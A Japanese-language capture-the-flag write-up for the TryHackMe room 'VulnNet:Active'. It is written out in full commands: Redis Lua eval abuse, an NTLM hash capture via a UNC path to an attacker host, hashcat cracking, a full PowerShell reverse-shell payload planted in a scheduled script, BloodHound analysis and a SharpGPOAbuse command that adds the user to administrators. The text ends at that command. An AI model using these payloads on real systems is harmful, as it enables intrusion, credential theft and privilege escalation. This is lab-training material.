脆弱なRedisを攻撃【TryHackMe- VulnNet:Active -Writeup】

今回は、TryHackMeで提供されている「VulnNet:Active」というルームの攻略をしていきます。

このルームでは以下のことを体験できます。

脆弱なRedisを悪用して指定したコマンドを実行

ImpacketのResponder を使いNTLMv2ハッシュを取得。

SMBサーバ上にある定期的に実行されるスクリプトを書き換え、ユーザ権限のリバースシェルを取得。

BloodHoundとSharpHoundを使って権限昇格の攻撃経路を明らかにする。

書き換え可能なGPOを利用して管理者権限に昇格。

これらのことに興味がある方が今回の読者の対象です。

ぎんた

無料でアクセス可能なので、試してみたい方はやってみてね。

Userフラグの取得

サービスの列挙

以下のコマンドで列挙を実施します。

nmap -sSV -T4 10.10.14.109

10.10.14.109：被害端末のIP

DNS（53番ポート）SMB（139、445番ポート）、RCP（135番ポート）、Redisサーバ（6379番ポート）などを確認できます。

ぎんた

SMBの調査をおこなったものの、認証情報が不明なため充分な情報を得られず。。

Redisサーバが公開されているのでこちらの調査を実施します。

Redisサーバの列挙

Redisはメモリ上で動作するNoSQLのデータベースです。

デフォルトだと認証なしでテキストベースのインタフェースでアクセス可能とのこと。

redis-cliを使って列挙を行います。

事前にツールをインストールします。

apt install redis-tools

続いて、以下のコマンドでRedisサーバに接続し、現在の設定を列挙します。

redis-cli -h 10.10.14.109

config get *

10.10.14.109：被害端末のIPアドレス

ここで、enterprise-securityというユーザ名と、Redisサーバのバージョン情報（2.8.2402）が判明しました。

以前のバージョンのRedisサーバを悪用

以前のバージョンのRedis（2.8.2402もその中に含まれている）を悪用する方法を紹介している記事があります。

Trying to hack Redis via HTTP requests

今回は以下のコマンドを使用して、LFI（Local File Inclusion）で行われるようなファイルの内容を閲覧できるかを確認します。

redis-cli -h 10.10.14.109 eval “dofile(‘C:\\Users\\enterprise-security\\Desktop\\user.txt’)” 0

user.txtは確認できそうです。

NTLMv2ハッシュの取得とパスワードクラックを実施

先ほどは端末内のファイルにアクセスできることが分かりました。

次に、被害端末から攻撃側端末の共有フォルダへのアクセスを試みてみます。

被害端末のユーザが共有フォルダへのアクセスを試みる際に、アクセスのログを確認することでNTLMハッシュを取得できるかもしれません。

こころ

そんな方法があるのか～、びっくり。

上記作業を行うために、ImpacketのResponderを攻撃側端末上で起動します。

sudo responder -I ens5

次に被害端末から公開されている攻撃側端末の共有フォルダにアクセスします。

redis-cli -h 10.10.14.109 eval “dofile(‘//10.10.57.36/test’)” 0

10.10.14.109：被害端末のIPアドレス
10.10.57.36：攻撃側端末のIPアドレス

ユーザの NTLM v2ハッシュを含んだリクエストを取得できました。

続いて、hashcatを使って取得したハッシュ値を解読します。

取得したハッシュをhash.txtに保存し、以下のコマンドを実施します。

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

-mの引数に指定するコマンドについては、「Example hashes」で検索すると一覧表を取得できますので、参考にしてください。

数秒で解読できました。

enterprise-securityユーザのパスワードが判明しました。

SMBサーバの列挙とユーザ権限のリバースシェルの取得

初めにSMBサーバを調査したときは認証情報が無かったので有用な情報が得られませんでした。

先ほど判明したパスワードを使用してsmbclientで接続します。

smbclient -L //10.10.14.109 -U enterprise-security –password=xxx

Sharename Type Comment

——— —- ——-

ADMIN$ Disk Remote Admin

C$ Disk Default share

Enterprise-Share Disk

IPC$ IPC Remote IPC

NETLOGON Disk Logon server share

SYSVOL Disk Logon server share

Enterprise-Shareが気になりますので確認してみます。

smbclient //10.10.14.109/Enterprise-Share -U enterprise-security –password=xxx

PurgeIrrelevantData_1826.ps1というスクリプトがありました。

こころ

絶対なんかに利用できそうだよね。

ぎんた

利用してくれと言わんばかりの匂いがするね。
ダウンロードして確認してみよう。

ダウンロードして攻撃側端末で中身を確認します。

get PurgeIrrelevantData_1826.ps1

cat PurgeIrrelevantData_1826.ps1

rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

おそらく定期的に実行されるタスクだろうと思われます。

このスクリプトを以下のように書き換えて、攻撃側端末にリバースシェルを確立させます。

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.109”,1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

書き換えたスクリプトを被害端末にアップロードします。

put PurgeIrrelevantData_1826.ps1

（smbclinet経由）

続いて、攻撃端末側でリバースシェル接続を待ち受けます。

nc -lvnp 1234

少しするとユーザ権限のシェルを取得し、ユーザフラグを獲得できます。

こころ

ひとまずユーザフラグはゲット！

Rootフラグの取得

SharpHoundとBloodHoundを使った攻撃経路の探索

今回は、SharpHoundとBloodHoundを使って権限昇格の攻撃経路を探索します。

まずは、SharpHound.exeをネット上で検索し攻撃側端末にダウンロードします。

続いて、smbclinet経由でアップロードし、実行します。

put SharpHound.exe

リバースシェルで以下のコマンドを実行します。

./SharpHound.exe

SharpHoundを実行した結果、zipファイルが生成されます。

ぎんた

SharpHoundで必要なデータを収集して、攻撃端末側でBloodHoundに読み込ませて解析するよ。

smbclinet経由でダウンロードします。

get 20230629230640_BloodHound.zip

続いて、攻撃側端末でBloodHoundを実行し、ダウンロードしたデータを分析します。

neo4j console

bloodhoundを実行

http://localhost:7474/に接続するブラウザが起動するので、以下の認証情報を入力します。

ユーザ名：neo4j

パスワード：neo4j

「Upload data」ボタンをクリックし、zipファイルをアップロードしますと解析が始まります。

現在のenterprise-securityユーザから管理者への最短パスを分析します。

「Find Shortest Paths to Domain Admins」をクリックして解析。

結果を確認すると、GPOの一つ（security-pol-vn）にGenericWrite権限があるようです。

enterprise-securityユーザがsecurity-pol-vnに書き込む権限があり、この設定を利用して管理者権限を取得します。

GenericWrite権限を使用したGPOの書き込みと権限昇格

GenericWrite権限を使用したGPOの書き込みを行うため、SharpGPOAbuse.exeというツールを使います。

ネットで検索して事前に攻撃側端末にダウンロードします。

ダウンロードしたらEnterprise-Share共有フォルダ経由でアップロードします。

put SharpGPOAbuse.exe

アップロード後、リバースシェルで以下のコマンドを実行します。

GPONameにSECURITY-POL-VNを指定し、管理者グループにenterprise-securityを追加します。

.\SharpGPOAbuse.exe –AddComputerTask –TaskName “babbadeckl_privesc” –Author vulnnet\administrator –Command “cmd.exe” –Arguments “/c net localgroup administrators enterprise-security /add” –GPOName “SECURITY-POL-VN”